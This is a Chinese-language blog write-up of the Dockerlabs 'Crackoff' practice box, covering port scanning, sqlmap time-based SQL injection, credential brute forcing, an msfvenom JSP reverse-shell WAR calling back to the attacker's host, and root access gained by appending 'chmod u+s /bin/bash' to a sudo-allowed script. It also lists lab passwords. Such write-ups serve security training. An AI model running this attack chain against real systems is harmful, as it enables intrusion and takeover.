Dockerlabs-Crackoff

Box Info

OSLinux
DifficultyHard

Nmap

[root@kali] /home/kali/crackoff  
❯ nmap 172.17.0.2 -sV  -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 21:28 CST
Nmap scan report for sitio.dl (172.17.0.2)
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3d:fc:bd:41:cb:81:e8:cd:a2:58:5a:78:68:2b:a3:04 (ECDSA)
|_  256 d8:5a:63:27:60:35:20:30:a9:ec:25:36:9e:50:06:8d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: CrackOff - Bienvenido
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.10 ms sitio.dl (172.17.0.2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.67 seconds

Gobuster

[root@kali] /home/kali/crackoff  
❯ gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/index.php            (Status: 200) [Size: 2974]
/login.php            (Status: 200) [Size: 3968]
/welcome.php          (Status: 200) [Size: 2800]
/db.php               (Status: 302) [Size: 75] [--> error.php]
/error.php            (Status: 200) [Size: 2705]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================

SQL Injection

进入login.php,发现在username字段中存在SQL注入漏洞,单引号闭合

Request复制到一个文件中

[root@kali] /home/kali/crackoff  
❯ sqlmap -r burp.txt -p username --dbs
[root@kali] /home/kali/crackoff  
❯ sqlmap -r burp.txt -p username -D crackofftrue_db -T users --dump

由于是时间盲注,得多等一会

hydra爆破吧,一个一个试有点费时间

rosa:ultramegaverypasswordhack

User

/var/www/alice_note中得到一串字符

并且内部开有8080端口

SSH端口转发

[root@kali] ~kali/Desktop  
❯ ssh rosa@172.17.0.2 -L 8080:127.0.0.1:8080

然后使用MSF模块进行登录爆破

得到正确的登录密码

[+] 127.0.0.1:8080 - Login Successful: tomitoma:supersecurepasswordultra

接下来上传war包进行Getshell

这里使用的是msfvenom生成的webshell

[root@kali] /home/kali/crackoff  
❯ msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.17.0.1 LPOST=4444 -f war -o shell.war                                                                 ⏎
Payload size: 1106 bytes
Final size of war file: 1106 bytes
Saved as: shell.war

部署后访问

成功得到反弹shell

进入/opt/tomcat得到mario的密码

mario:marioeseljefe

登录后拿到user.txt

Root

查看tomcat的特殊命令

sudo -l
Matching Defaults entries for tomcat on 157676472df8:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User tomcat may run the following commands on 157676472df8:
    (ALL) NOPASSWD: /opt/tomcat/bin/catalina.sh

直接写入提权部分

echo "chmod u+s /bin/bash" >> /opt/tomcat/bin/catalina.sh

sudo  /opt/tomcat/bin/catalina.sh start

Summary

UserSQL时间盲注得到登录账户列表,用hydra进行快速爆破。内部存在tomcat服务,同样进行爆破尝试,上传木马反弹shell。可以参考下面这个链接,我尝试使用/usr/share/webshells/jsp/cmdjsp.jsp进行转化为war文件,但是无法命令执行???无奈使用msfveom成功反弹。

Root:直接写入/opt/tomcat/bin/catalina.sh,以root的身份执行即可。

感觉这个机器奇奇怪怪的。。

当前页面链接: https://www.hyhforever.top/dockerlabs-crackoff/
如果您对本文内容有所意见或者建议,欢迎评论。
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇